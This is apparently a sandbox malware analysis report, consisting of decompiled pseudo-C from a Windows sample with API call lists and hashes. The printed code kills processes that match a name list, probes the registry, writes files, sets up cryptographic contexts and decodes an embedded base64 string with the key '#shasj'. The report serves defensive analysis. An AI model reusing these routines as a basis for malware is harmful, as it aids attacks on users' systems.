                                      					_t9 = Process32NextW(_t24, _t15);
                                      					_t7 = _t15 + 0x24; // 0x24
                                      					_t17 = _t7;
                                      					if(_t9 != 0) {
                                      						_t23 = 0;
                                      						do {
                                      							goto L2;
                                      						} while (_t23 < 0x27);
                                      						goto L7;
                                      					}
                                      					if(_t15 != 0) {
                                      						VirtualFree(_t15, 0, 0x8000); // executed
                                      					}
                                      					_t10 = FindCloseChangeNotification(_t24); // executed
                                      					return _t10;
                                      					L2:
                                      					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
                                      					if(_t8 == 0) {
                                      						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
                                      						if(_t18 != 0) {
                                      							TerminateProcess(_t18, 0);
                                      							CloseHandle(_t18);
                                      						}
                                      					}
                                      					_t23 = _t23 + 1;
                                      					_t5 = _t15 + 0x24; // 0x24
                                      					_t17 = _t5;
                                      				}
                                      			}












                                      0x004047f8
                                      0x004047f8
                                      0x00404800
                                      0x00404800
                                      0x00404805
                                      0x0040480d
                                      0x0040481b
                                      0x0040481f
                                      0x00404824
                                      0x00404831
                                      0x00404831
                                      0x0040481f
                                      0x0040483b
                                      0x0040483c
                                      0x0040483c
                                      0x00404842
                                      0x00000000
                                      0x00000000
                                      0x00404844
                                      0x00404844
                                      0x0040484a
                                      0x00404850
                                      0x00404850
                                      0x00404855
                                      0x004047f4
                                      0x00404800
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404800
                                      0x00404859
                                      0x00404863
                                      0x00404863
                                      0x0040486a
                                      0x00404872
                                      0x00404800
                                      0x00404805
                                      0x0040480d
                                      0x0040481b
                                      0x0040481f
                                      0x00404824
                                      0x00404831
                                      0x00404831
                                      0x0040481f
                                      0x0040483b
                                      0x0040483c
                                      0x0040483c
                                      0x0040483f

                                      APIs
                                      • lstrcmpiW.KERNEL32(00000002,00000024), ref: 00404805
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00404815
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00404824
                                      • CloseHandle.KERNEL32(00000000), ref: 00404831
                                      • Process32NextW.KERNEL32(?,00000000), ref: 0040484A
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00404863
                                      • FindCloseChangeNotification.KERNEL32(?), ref: 0040486A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseProcess$ChangeFindFreeHandleNextNotificationOpenProcess32TerminateVirtuallstrcmpi
                                      • String ID:
                                      • API String ID: 3573210778-0
                                      • Opcode ID: 96ca63748bec8ddf27f1aab28855f42674f0454dc6f50e2837a6c1d9c7404263
                                      • Instruction ID: 1a13c8a93cbec1d8c6bc579d8d4bacd9a5b995379d62742e90ee94b5f9f4cf80
                                      • Opcode Fuzzy Hash: 96ca63748bec8ddf27f1aab28855f42674f0454dc6f50e2837a6c1d9c7404263
                                      • Instruction Fuzzy Hash: 7E01D6B7200111ABEB102F10AD48B6B7368EBD5301F104435FF49B61A1EB759C05CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00406D10(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
                                      				void* _v8;
                                      				long _t14;
                                      				long _t18;
                                      
                                      				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
                                      				if(_t14 != 0) {
                                      					return 0;
                                      				} else {
                                      					_a8 = _a20;
                                      					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
                                      					if(_t18 != 0) {
                                      						GetLastError();
                                      						RegCloseKey(_v8);
                                      						return 0;
                                      					} else {
                                      						_t11 = _t18 + 1; // 0x1, executed
                                      						RegCloseKey(_v8); // executed
                                      						return _t11;
                                      					}
                                      				}
                                      			}






                                      0x00406d26
                                      0x00406d30
                                      0x00406d84
                                      0x00406d32
                                      0x00406d35
                                      0x00406d47
                                      0x00406d4f
                                      0x00406d66
                                      0x00406d6f
                                      0x00406d7b
                                      0x00406d51
                                      0x00406d54
                                      0x00406d57
                                      0x00406d63
                                      0x00406d63
                                      0x00406d4f

                                      APIs
                                      • RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,00000000,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D26
                                      • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000080,?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D47
                                      • RegCloseKey.KERNEL32(?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D57
                                      • GetLastError.KERNEL32(?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D66
                                      • RegCloseKey.ADVAPI32(?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D6F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close$ErrorLastOpenQueryValue
                                      • String ID:
                                      • API String ID: 2437438455-0
                                      • Opcode ID: 9e6bb54fed31df0af1995cc1e5d9b2912871e352615202f1e244d14966f57426
                                      • Instruction ID: 038fbdeb07fc8f9d94efb3036f8b9b37cf4c52d37effb2f9ef8d9ff464795a08
                                      • Opcode Fuzzy Hash: 9e6bb54fed31df0af1995cc1e5d9b2912871e352615202f1e244d14966f57426
                                      • Instruction Fuzzy Hash: 3D011A7260011CABCB209F94EE09DDA7B7CEF08351F008162FD05E6121D7329E20EBE4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 91%
                                      			E00402830(WCHAR* __ecx, void* __edx, long _a4) {
                                      				long _v8;
                                      				void* _t3;
                                      				int _t7;
                                      				void* _t9;
                                      				void* _t14;
                                      				struct _OVERLAPPED* _t17;
                                      
                                      				_push(__ecx);
                                      				_t9 = __edx; // executed
                                      				_t3 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0); // executed
                                      				_t14 = _t3;
                                      				_t17 = 0;
                                      				if(_t14 != 0xffffffff) {
                                      					if(_t9 == 0) {
                                      						L3:
                                      						_t17 = 1;
                                      					} else {
                                      						_t7 = WriteFile(_t14, _t9, _a4,  &_v8, 0); // executed
                                      						if(_t7 != 0) {
                                      							goto L3;
                                      						}
                                      					}
                                      					FindCloseChangeNotification(_t14); // executed
                                      				}
                                      				return _t17;
                                      			}









                                      0x00402833
                                      0x0040284a
                                      0x0040284c
                                      0x00402852
                                      0x00402854
                                      0x00402859
                                      0x0040285d
                                      0x00402873
                                      0x00402873
                                      0x0040285f
                                      0x00402869
                                      0x00402871
                                      0x00000000
                                      0x00000000
                                      0x00402871
                                      0x00402879
                                      0x00402879
                                      0x00402887

                                      APIs
                                      • CreateFileW.KERNEL32(00402C02,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000000,00402C02,?,0040293C,?), ref: 0040284C
                                      • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040293C,?,?,?,?,00402C02), ref: 00402869
                                      • FindCloseChangeNotification.KERNEL32(00000000,?,0040293C,?,?,?,?,00402C02), ref: 00402879
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$ChangeCloseCreateFindNotificationWrite
                                      • String ID:
                                      • API String ID: 3805958096-0
                                      • Opcode ID: 9e9a3c89b6850285b0aaeb729945f32371e326f8768ed0970ed47c3756836101
                                      • Instruction ID: 04185e8f6c4e23bdd04b7cf8f7d55746a19b6698dc5ace76ea1193252a574fad
                                      • Opcode Fuzzy Hash: 9e9a3c89b6850285b0aaeb729945f32371e326f8768ed0970ed47c3756836101
                                      • Instruction Fuzzy Hash: 9CF0827734021477F6201A96AD8DF6BB65CD786B60F104236BA08B61D1D6B5DC0152A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00404CB0(void* __ebx, CHAR* __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                      				intOrPtr* _v8;
                                      				CHAR* _v12;
                                      				long _v16;
                                      				void _v4112;
                                      				char* _t18;
                                      				char* _t21;
                                      				intOrPtr _t24;
                                      				char _t26;
                                      				void* _t31;
                                      				void* _t33;
                                      				void* _t38;
                                      
                                      				E004084B0(0x100c);
                                      				_v8 = __edx;
                                      				_v12 = __ecx;
                                      				while(1) {
                                      					L1:
                                      					_t18 = ReadFile( *0x412b10,  &_v4112, 0x1000,  &_v16, 0); // executed
                                      					_t24 = _v4112;
                                      					_t33 =  &_v4112;
                                      					_t21 = _t18;
                                      					if(_t24 == 0) {
                                      						break;
                                      					}
                                      					_t38 = _t33 - "Can\'t find server";
                                      					do {
                                      						_t18 = "Can\'t find server";
                                      						if(_t24 == 0) {
                                      							goto L9;
                                      						} else {
                                      							while(1) {
                                      								_t26 =  *_t18;
                                      								if(_t26 == 0) {
                                      									goto L1;
                                      								}
                                      								_t31 =  *((char*)(_t38 + _t18)) - _t26;
                                      								if(_t31 != 0) {
                                      									L8:
                                      									if( *_t18 == 0) {
                                      										goto L1;
                                      									} else {
                                      										goto L9;
                                      									}
                                      								} else {
                                      									_t18 =  &(_t18[1]);
                                      									if( *((intOrPtr*)(_t38 + _t18)) != _t31) {
                                      										continue;
                                      									} else {
                                      										goto L8;
                                      									}
                                      								}
                                      								goto L10;
                                      							}
                                      							goto L1;
                                      						}
                                      						goto L10;
                                      						L9:
                                      						_t24 =  *((intOrPtr*)(_t33 + 1));
                                      						_t33 = _t33 + 1;
                                      						_t38 = _t38 + 1;
                                      					} while (_t24 != 0);
                                      					break;
                                      				}
                                      				L10:
                                      				if(_t21 != 0 && _v16 != 0) {
                                      					return E00404BA0( &_v4112, _v12, _v8);
                                      				}
                                      				return _t18;
                                      			}














                                      0x00404cb8
                                      0x00404cbf
                                      0x00404cc2
                                      0x00404cc6
                                      0x00404cc6
                                      0x00404cde
                                      0x00404ce4
                                      0x00404cea
                                      0x00404cf0
                                      0x00404cf4
                                      0x00000000
                                      0x00000000
                                      0x00404cf8
                                      0x00404d00
                                      0x00404d00
                                      0x00404d07
                                      0x00000000
                                      0x00404d10
                                      0x00404d10
                                      0x00404d10
                                      0x00404d14
                                      0x00000000
                                      0x00000000
                                      0x00404d1d
                                      0x00404d1f
                                      0x00404d27
                                      0x00404d2a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404d21
                                      0x00404d21
                                      0x00404d25
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404d25
                                      0x00000000
                                      0x00404d1f
                                      0x00000000
                                      0x00404d10
                                      0x00000000
                                      0x00404d2c
                                      0x00404d2c
                                      0x00404d2f
                                      0x00404d30
                                      0x00404d31
                                      0x00000000
                                      0x00404d00
                                      0x00404d35
                                      0x00404d3a
                                      0x00000000
                                      0x00404d53
                                      0x00404d59

                                      APIs
                                      • ReadFile.KERNEL32(?,00001000,00000000,00000000,00000000,00000000,00000000,?,00404E7E), ref: 00404CDE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: Can't find server
                                      • API String ID: 2738559852-1141070784
                                      • Opcode ID: ba09573ce324996396f8dcbb0825618a8ba3ca0830273c127b8c0ebe83a17994
                                      • Instruction ID: 28e4a0bf322fcfe5cc8b20f66b714b44768279d7133ed13092125b5fab13ce64
                                      • Opcode Fuzzy Hash: ba09573ce324996396f8dcbb0825618a8ba3ca0830273c127b8c0ebe83a17994
                                      • Instruction Fuzzy Hash: 9A115E749042999BEB32CB5099107EBBBB8DF86306F1481F7DE8477390D6781D44C754
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 91%
                                      			E00405EF0(void** __ecx) {
                                      				void** _v8;
                                      				void* _t19;
                                      				void* _t20;
                                      				void* _t24;
                                      
                                      				_push(__ecx);
                                      				_v8 = __ecx;
                                      				_t19 = VirtualAlloc(0, 0x123, 0x3000, 4); // executed
                                      				_v8[1] = _t19;
                                      				_t20 = VirtualAlloc(0, 0x515, 0x3000, 4); // executed
                                      				 *_v8 = _t20;
                                      				_v8[3] = 0x123;
                                      				_v8[2] = 0x515;
                                      				_t13 =  &(_v8[1]); // 0xc7000000
                                      				_t24 = E00405D80( *_t13,  &(_v8[3]),  *_v8,  &(_v8[2])); // executed
                                      				if(_t24 == 0) {
                                      					_v8[4] = 1;
                                      				}
                                      				_v8[4] = 0;
                                      				return _v8;
                                      			}







                                      0x00405ef3
                                      0x00405ef4
                                      0x00405f05
                                      0x00405f0e
                                      0x00405f1f
                                      0x00405f28
                                      0x00405f2d
                                      0x00405f37
                                      0x00405f55
                                      0x00405f59
                                      0x00405f63
                                      0x00405f68
                                      0x00405f68
                                      0x00405f72
                                      0x00405f7f

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000123,00003000,00000004,?,?,0040491E), ref: 00405F05
                                      • VirtualAlloc.KERNEL32(00000000,00000515,00003000,00000004,?,0040491E), ref: 00405F1F
                                        • Part of subcall function 00405D80: CryptAcquireContextW.ADVAPI32(0040491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,00404916,?,0040491E), ref: 00405D95
                                        • Part of subcall function 00405D80: GetLastError.KERNEL32(?,0040491E), ref: 00405D9F
                                        • Part of subcall function 00405D80: CryptAcquireContextW.ADVAPI32(0040491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0040491E), ref: 00405DBB
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AcquireAllocContextCryptVirtual$ErrorLast
                                      • String ID:
                                      • API String ID: 3824161113-0
                                      • Opcode ID: f497ffd91905dbfabb09833d428e6ecb82607aba21d6ec82d0ee64889756009d
                                      • Instruction ID: 2a9a3b098361438b00d7a8dceb517dfd63e39cf7f749df0161de1cd59aef210a
                                      • Opcode Fuzzy Hash: f497ffd91905dbfabb09833d428e6ecb82607aba21d6ec82d0ee64889756009d
                                      • Instruction Fuzzy Hash: 7111C974A40208EFE704CF94DA55F9AB7F5EF88709F208198E904AB392D7B5AF009B54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			_entry_() {
                                      				void* _t2;
                                      
                                      				E004048A0(_t2); // executed
                                      				ExitProcess(0);
                                      			}




                                      0x00404af3
                                      0x00404afa

                                      APIs
                                        • Part of subcall function 004048A0: Sleep.KERNEL32(000003E8), ref: 004048AB
                                        • Part of subcall function 004048A0: ExitProcess.KERNEL32 ref: 004048BC
                                      • ExitProcess.KERNEL32 ref: 00404AFA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess$Sleep
                                      • String ID:
                                      • API String ID: 1320946285-0
                                      • Opcode ID: 1f204cbbbf4b91cb41731de12bafb510547bb58fbcebeb620ebc01891cafb445
                                      • Instruction ID: 1b19d15e4aeeb9909d6bd86e0db19be6c339a400cc2da824b43fea8bc324f338
                                      • Opcode Fuzzy Hash: 1f204cbbbf4b91cb41731de12bafb510547bb58fbcebeb620ebc01891cafb445
                                      • Instruction Fuzzy Hash: 56A011302082080AE0803BA2A80AB0A320C0B00A02F800030A208A80C208A8280080AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 84%
                                      			E00405050(CHAR* __ecx, CHAR** __edx) {
                                      				int _v8;
                                      				CHAR* _v12;
                                      				int _v16;
                                      				char _v18;
                                      				void* _v20;
                                      				void* _v24;
                                      				void* _v28;
                                      				char _v32;
                                      				void* _v36;
                                      				CHAR** _v40;
                                      				void* _v44;
                                      				char _v299;
                                      				char _v300;
                                      				void* _v356;
                                      				void* _v360;
                                      				int _t55;
                                      				int _t56;
                                      				BYTE* _t57;
                                      				int _t59;
                                      				void* _t63;
                                      				void* _t64;
                                      				char _t65;
                                      				void* _t77;
                                      				signed int _t79;
                                      				signed int _t81;
                                      				int _t82;
                                      				int _t85;
                                      				char _t87;
                                      				CHAR* _t95;
                                      				int _t97;
                                      				char* _t98;
                                      				void* _t107;
                                      				void* _t108;
                                      				signed char _t109;
                                      				short* _t111;
                                      				WCHAR* _t116;
                                      				CHAR* _t117;
                                      				BYTE* _t124;
                                      				WCHAR* _t125;
                                      				WCHAR* _t126;
                                      				void* _t127;
                                      				long _t128;
                                      				char* _t129;
                                      				int _t130;
                                      				void* _t131;
                                      				CHAR* _t132;
                                      				void* _t133;
                                      				long _t134;
                                      				char* _t135;
                                      
                                      				_v40 = __edx;
                                      				_v12 = __ecx;
                                      				_t55 = lstrlenA(__ecx);
                                      				_t107 = VirtualAlloc;
                                      				_t56 = _t55 + 1;
                                      				_v16 = _t56;
                                      				_t4 = _t56 + 1; // 0x2
                                      				_t128 = _t4;
                                      				_t57 = VirtualAlloc(0, _t128, 0x3000, 0x40);
                                      				_v44 = _t57;
                                      				if(_t57 == 0 || _v16 >= _t128) {
                                      					_t124 = 0;
                                      					__eflags = 0;
                                      				} else {
                                      					_t124 = _t57;
                                      				}
                                      				_t129 = 0;
                                      				_t59 = CryptStringToBinaryA(_v12, 0, 1, _t124,  &_v16, 0, 0);
                                      				_t144 = _t59;
                                      				if(_t59 == 0) {
                                      					GetLastError();
                                      					goto L26;
                                      				} else {
                                      					_t63 = "#shasj"; // 0x61687323
                                      					asm("movq xmm0, [0x410128]");
                                      					_t130 = _v16;
                                      					_v24 = _t63;
                                      					_t64 =  *0x410134; // 0x6a73
                                      					_v20 = _t64;
                                      					_t65 =  *0x410136; // 0x0
                                      					_v18 = _t65;
                                      					asm("movq [ebp-0x1c], xmm0");
                                      					_v300 = 0;
                                      					E00408B30( &_v299, 0, 0xff);
                                      					E00405C40( &_v300,  &_v32, lstrlenA( &_v32));
                                      					E00405CF0( &_v300, _t124, _t130);
                                      					_t116 =  &_v32;
                                      					asm("xorps xmm0, xmm0");
                                      					asm("movdqu [ebp-0x1c], xmm0");
                                      					E004033E0(_t116, _t144, _t124);
                                      					if(_v32 != 0) {
                                      						E00404FD0();
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						_push(_t107);
                                      						_push(_t130);
                                      						_push(_t124);
                                      						_t125 = _t116;
                                      						_t131 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
                                      						_v360 = _t131;
                                      						GetModuleFileNameW(0, _t131, 0x200);
                                      						_t108 = CreateFileW(_t131, 0x80000000, 1, 0, 3, 0x80, 0);
                                      						_v356 = _t108;
                                      						__eflags = _t108 - 0xffffffff;
                                      						if(_t108 != 0xffffffff) {
                                      							_t77 = CreateFileMappingW(_t108, 0, 8, 0, 0, 0);
                                      							_v28 = _t77;
                                      							__eflags = _t77;
                                      							if(_t77 != 0) {
                                      								_t79 = MapViewOfFile(_t77, 1, 0, 0, 0);
                                      								_v16 = _t79;
                                      								__eflags = _t79;
                                      								if(_t79 != 0) {
                                      									_t41 = _t79 + 0x4e; // 0x4e
                                      									_t132 = _t41;
                                      									_v12 = _t132;
                                      									_t81 = lstrlenW(_t125);
                                      									_t109 = 0;
                                      									_t126 =  &(_t125[_t81]);
                                      									_t82 = lstrlenA(_t132);
                                      									__eflags = _t82 + _t82;
                                      									if(_t82 + _t82 != 0) {
                                      										_t117 = _t132;
                                      										do {
                                      											__eflags = _t109 & 0x00000001;
                                      											if((_t109 & 0x00000001) != 0) {
                                      												 *((char*)(_t126 + _t109)) = 0;
                                      											} else {
                                      												_t87 =  *_t132;
                                      												_t132 =  &(_t132[1]);
                                      												 *((char*)(_t126 + _t109)) = _t87;
                                      											}
                                      											_t109 = _t109 + 1;
                                      											_t85 = lstrlenA(_t117);
                                      											_t117 = _v12;
                                      											__eflags = _t109 - _t85 + _t85;
                                      										} while (_t109 < _t85 + _t85);
                                      									}
                                      									UnmapViewOfFile(_v16);
                                      									_t108 = _v20;
                                      									_t131 = _v24;
                                      								}
                                      								CloseHandle(_v28);
                                      							}
                                      							CloseHandle(_t108);
                                      						}
                                      						return VirtualFree(_t131, 0, 0x8000);
                                      					} else {
                                      						_t127 = _v28;
                                      						_v12 = 1;
                                      						if(_t127 != 0) {
                                      							_t97 = lstrlenA(_t127);
                                      							_v8 = _t97;
                                      							_t24 = _t97 + 1; // 0x1
                                      							_t134 = _t24;
                                      							_t98 = VirtualAlloc(0, _t134, 0x3000, 0x40);
                                      							_v36 = _t98;
                                      							if(_t98 == 0 || _v8 >= _t134) {
                                      								_t135 = 0;
                                      								__eflags = 0;
                                      							} else {
                                      								_t135 = _t98;
                                      							}
                                      							if(CryptStringToBinaryA(_t127, 0, 1, _t135,  &_v8, 0, 0) != 0) {
                                      								_t111 = VirtualAlloc(0, 2 + _v8 * 2, 0x3000, 4);
                                      								if(_t111 != 0) {
                                      									if(MultiByteToWideChar(0xfde9, 0, _t135, 0xffffffff, _t111, _v8 + 1) <= 0) {
                                      										GetLastError();
                                      									} else {
                                      										 *0x412b00 = _t111;
                                      									}
                                      								}
                                      							}
                                      							VirtualFree(_v36, 0, 0x8000);
                                      						}
                                      						_t33 =  &_v24; // 0x4054e4
                                      						_t133 =  *_t33;
                                      						if(_t133 != 0) {
                                      							_t95 = VirtualAlloc(0, lstrlenA(_t133) + 1, 0x3000, 4);
                                      							 *_v40 = _t95;
                                      							if(_t95 != 0) {
                                      								lstrcpyA(_t95, _t133);
                                      							}
                                      						}
                                      						_t88 = GetProcessHeap;
                                      						if(_t127 != 0) {
                                      							HeapFree(GetProcessHeap(), 0, _t127);
                                      							_t88 = GetProcessHeap;
                                      						}
                                      						if(_t133 != 0) {
                                      							HeapFree( *_t88(), 0, _t133);
                                      						}
                                      						_t129 = _v12;
                                      						L26:
                                      						VirtualFree(_v44, 0, 0x8000);
                                      						return _t129;
                                      					}
                                      				}
                                      			}




















































                                      0x0040505d
                                      0x00405062
                                      0x00405065
                                      0x0040506b
                                      0x00405071
                                      0x00405079
                                      0x0040507c
                                      0x0040507c
                                      0x00405082
                                      0x00405084
                                      0x00405089
                                      0x00405094
                                      0x00405094
                                      0x00405090
                                      0x00405090
                                      0x00405090
                                      0x00405096
                                      0x004050a5
                                      0x004050ab
                                      0x004050ad
                                      0x0040525e
                                      0x00000000
                                      0x004050b3
                                      0x004050b3
                                      0x004050b8
                                      0x004050c0
                                      0x004050c3
                                      0x004050c6
                                      0x004050cc
                                      0x004050d0
                                      0x004050da
                                      0x004050e6
                                      0x004050eb
                                      0x004050f2
                                      0x0040510e
                                      0x0040511c
                                      0x00405124
                                      0x00405127
                                      0x0040512a
                                      0x00405130
                                      0x00405139
                                      0x00405266
                                      0x0040526b
                                      0x0040526c
                                      0x0040526d
                                      0x0040526e
                                      0x0040526f
                                      0x00405276
                                      0x00405277
                                      0x00405278
                                      0x00405287
                                      0x0040528f
                                      0x00405299
                                      0x0040529c
                                      0x004052bb
                                      0x004052bd
                                      0x004052c0
                                      0x004052c3
                                      0x004052d4
                                      0x004052da
                                      0x004052dd
                                      0x004052df
                                      0x004052ea
                                      0x004052f0
                                      0x004052f3
                                      0x004052f5
                                      0x004052f7
                                      0x004052f7
                                      0x004052fb
                                      0x004052fe
                                      0x00405305
                                      0x00405307
                                      0x0040530a
                                      0x00405310
                                      0x00405312
                                      0x00405314
                                      0x00405316
                                      0x00405316
                                      0x00405319
                                      0x00405323
                                      0x0040531b
                                      0x0040531b
                                      0x0040531d
                                      0x0040531e
                                      0x0040531e
                                      0x00405328
                                      0x00405329
                                      0x0040532f
                                      0x00405334
                                      0x00405334
                                      0x00405316
                                      0x0040533b
                                      0x00405341
                                      0x00405344
                                      0x00405344
                                      0x0040534a
                                      0x0040534a
                                      0x00405351
                                      0x00405351
                                      0x0040536b
                                      0x0040513f
                                      0x0040513f
                                      0x00405142
                                      0x0040514b
                                      0x00405152
                                      0x0040515f
                                      0x00405162
                                      0x00405162
                                      0x00405168
                                      0x0040516a
                                      0x0040516f
                                      0x0040517a
                                      0x0040517a
                                      0x00405176
                                      0x00405176
                                      0x00405176
                                      0x00405192
                                      0x004051aa
                                      0x004051ae
                                      0x004051c8
                                      0x004051d2
                                      0x004051ca
                                      0x004051ca
                                      0x004051ca
                                      0x004051c8
                                      0x004051d8
                                      0x004051e8
                                      0x004051e8
                                      0x004051ee
                                      0x004051ee
                                      0x004051f3
                                      0x00405207
                                      0x0040520c
                                      0x00405210
                                      0x00405214
                                      0x00405214
                                      0x00405210
                                      0x00405220
                                      0x00405227
                                      0x0040522f
                                      0x00405231
                                      0x00405231
                                      0x00405238
                                      0x00405240
                                      0x00405240
                                      0x00405242
                                      0x00405245
                                      0x0040524f
                                      0x0040525d
                                      0x0040525d
                                      0x00405139

                                      APIs
                                      • lstrlenA.KERNEL32(?,00000001,?,?), ref: 00405065
                                      • VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 00405082
                                      • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 004050A5
                                      • _memset.LIBCMT ref: 004050F2
                                      • lstrlenA.KERNEL32(?), ref: 004050FE
                                      • lstrlenA.KERNEL32(?,00000000), ref: 00405152
                                      • VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00405168
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0040518A
                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004051A8
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000001), ref: 004051C0
                                      • GetLastError.KERNEL32 ref: 004051D2
